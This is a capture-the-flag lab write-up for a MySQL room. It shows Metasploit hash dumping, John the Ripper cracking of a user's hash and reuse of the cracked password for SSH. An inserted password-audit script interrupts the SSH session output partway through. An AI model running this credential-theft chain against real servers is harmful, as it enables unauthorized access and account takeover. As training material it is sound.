TryHackMe Network Services 2 (MySQL) writeup (zh-TW)
Description: this room demonstrates how to enumerate and exploit a MySQL service in order to gain system access.
📋 Target information
- Target IP: 10.201.5.x.x
- Service: MySQL
- Goal: gain system access through MySQL credential reuse
1. Credential test
The room provides test credentials (simulating credentials obtained from another service):
- Username: root
- Password: password
Manual connection test
mysql -h 10.201.5.209 -u root -p
# enter password: password
✅ Connection successful! The credentials are valid.
mysql> exit
2. Using the Metasploit mysql_sql module
Start Metasploit
msfconsole
Configure the module
msf6 > search mysql_sql
msf6 > use auxiliary/admin/mysql/mysql_sql
msf6 auxiliary(admin/mysql/mysql_sql) > show options
The three options that need to be set (in descending order): PASSWORD, RHOSTS, USERNAME
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.201.5.209
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
3. Running SQL queries
Test the default command (queries the server version)
msf6 auxiliary(admin/mysql/mysql_sql) > run
Result:
[*] 10.201.5.209:3306 - | 8.0.42-0ubuntu0.20.04.1 |
MySQL version: 8.0.42-0ubuntu0.20.04.1
List all databases
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
msf6 auxiliary(admin/mysql/mysql_sql) > run
Result: 4 databases in total
information_schema
mysql
performance_schema
sys
4. Database schema dump
Using the mysql_schemadump module
msf6 > use auxiliary/scanner/mysql/mysql_schemadump
Full module name: auxiliary/scanner/mysql/mysql_schemadump
Set the options and run
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set PASSWORD password
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set RHOSTS 10.201.5.209
msf6 auxiliary(scanner/mysql/mysql_schemadump) > run
Last table dumped: x$waits_global_by_latency
5. Extracting password hashes
Using the mysql_hashdump module
msf6 > use auxiliary/scanner/mysql/mysql_hashdump
Full module name: auxiliary/scanner/mysql/mysql_hashdump
Set the options and run
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.201.5.209
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
Extracted hashes:
[+] root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] carl:*EA031893AA21444B170FC2162A56978B8CEECE18 ⬅️ non-default user!
[+] debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] mysql.infoschema:$A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[+] mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] root:
Non-default user: carl
6. Cracking the password hash
Save the hash to a file
echo "carl:*EA031893AA21444B170FC2162A56978B8CEECE18" > hash.txt
User/hash combination string: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
Crack it with John the Ripper
john hash.txt
Cracking result:
doggie (carl)
1g 0:00:00:00 DONE 3/3
✅ Password cracked: doggie
7. Credential reuse attack
Try logging in over SSH with the cracked MySQL password
ssh carl@10.201.5.209
# password: doggie
✅ SSH login successful!
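The hashes dumped in section 5 and cracked in section 6 use mysql_native_password, which is simply '*' followed by the uppercase hex of SHA1(SHA1(password)), unsalted. The following audit script is an added example (not part of the original writeup or of Metasploit): it takes the user:hash lines from the hashdump output above, flags accounts with an empty password or a locked/unusable hash, and checks the remaining native hashes against a constructed list of weak passwords, which is the check a DBA would run before an attacker does.

```python
import hashlib
import re

# Loot lines as printed by mysql_hashdump in section 5 of this writeup (user:hash).
HASHDUMP_LINES = """\
root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
mysql.infoschema:$A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
root:""".splitlines()

# Constructed list of weak passwords to check against (not a real wordlist).
WEAK_CANDIDATES = ["password", "doggie", "root", "123456", "mysql"]

# A usable mysql_native_password hash is '*' followed by 40 uppercase hex digits.
NATIVE_RE = re.compile(r"^\*[0-9A-F]{40}$")


def mysql_native_hash(password: str) -> str:
    """mysql_native_password: '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def audit_hashdump(lines, candidates):
    """Return (user, finding) per line: 'empty', 'caching_sha2' (newer plugin,
    not checked here), 'invalid' (locked account), 'weak:<pw>' or 'native'."""
    # Hash each candidate once: the scheme is unsalted, so one candidate hash
    # is compared against every account, which is what makes reuse cheap.
    table = {mysql_native_hash(p): p for p in candidates}
    findings = []
    for line in lines:
        user, _, h = line.strip().partition(":")
        if h == "":
            findings.append((user, "empty"))
        elif h.startswith("$A$005$"):
            findings.append((user, "caching_sha2"))
        elif not NATIVE_RE.match(h):
            findings.append((user, "invalid"))
        elif h in table:
            findings.append((user, "weak:" + table[h]))
        else:
            findings.append((user, "native"))
    return findings
```

Running audit_hashdump(HASHDUMP_LINES, WEAK_CANDIDATES) shows the second root entry has no password at all, which is a finding on its own regardless of cracking.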
Welcome to Ubuntu 20.04.6 LTS
carl@ip-10-201-5-209:~$
8. Getting the flag
carl@ip-10-201-5-209:~$ ls
MySQL.txt
carl@ip-10-201-5-209:~$ cat MySQL.txt
THM{Redacted}
Summary of techniques
- ✅ MySQL client: manual connection test
- ✅ Metasploit mysql_sql: run SQL queries
- ✅ Metasploit mysql_schemadump: dump the database schema
- ✅ Metasploit mysql_hashdump: extract password hashes
- ✅ John the Ripper: crack MySQL password hashes
- ✅ Credential reuse: the MySQL password also works for SSH login
Lessons learned
When using Metasploit, use search to find the relevant modules, e.g. search mysql_hashdump:
msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_hashdump . normal No MYSQL Password Hashdump
1 auxiliary/analyze/crack_databases . normal No Password Cracker: Databases
2 \_ action: hashcat . . . Use Hashcat
3 \_ action: john . . . Use John the Ripper
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/analyze/crack_databases
After interacting with a module you can manually set a ACTION with set ACTION 'john'
To use a module, select it with use, e.g. use auxiliary/scanner/mysql/mysql_hashdump,
and then check its usage with options, as shown below:
msf6 auxiliary(scanner/mysql/mysql_schemadump) > use auxiliary/scanner/mysql/mysql_hashdump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3306 no The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The username to authenticate as
View the full module info with the info, or info -d command.
Finally, set the relevant parameters for each module and run it:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.201.5.209
RHOSTS => 10.201.5.209
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 10.201.5.209:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.201.5.209:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[+] 10.201.5.209:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.201.5.209:3306 - Saving HashString as Loot: mysql.infoschema:$A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[+] 10.201.5.209:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.201.5.209:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.201.5.209:3306 - Saving HashString as Loot: root:
[*] 10.201.5.209:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed